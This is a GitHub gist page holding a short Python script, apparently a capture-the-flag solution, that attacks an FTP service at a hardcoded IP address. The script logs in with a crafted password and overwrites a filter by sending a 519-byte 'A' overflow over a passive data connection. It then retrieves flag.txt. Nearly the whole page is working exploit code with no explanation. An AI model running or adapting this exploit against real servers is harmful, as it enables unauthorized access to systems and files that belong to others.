Skip to content

Instantly share code, notes, and snippets.

@peternguyen93 peternguyen93/ftp.py
Created Sep 21, 2015

Embed
What would you like to do?
#!/usr/bin/python
from Pwn import *
# p = Pwn(mode=1,port=12012)
p = Pwn(mode=1,host='54.175.183.202',port=12012)
username = 'blankwall'
password = ';rpywx~YYYBBBBB~:::::::=KP`'
def login(user,passwd):
p.write('USER ' + user + '\n')
p.read_until('Please send password for user blankwall\n')
p.write('PASS ' + passwd)
p.read_until('logged in')
def stor():
p.write('PASV\n')
d = p.recv(1024)
_port = d.replace('PASV succesful listening on port:','').strip(' \n')
p.write('STOR\n')
c1 = Pwn(host='54.175.183.202',port=int(_port))
c1.connect()
c1.write('A'*519 + '\n')
c1.close()
p.recv(1024)
p.recv(1024)
def getflag():
p.write('PASV\n')
d = p.recv(1024)
_port = d.replace('PASV succesful listening on port:','').strip(' \n')
p.write('RETR flag.txt\n')
c1 = Pwn(host='54.175.183.202',port=int(_port))
c1.connect()
print c1.recv(1024)
c1.close()
def exploit():
p.connect()
login(username,password)
print 'Overwrite filter'
stor()
print 'Get flag'
getflag()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.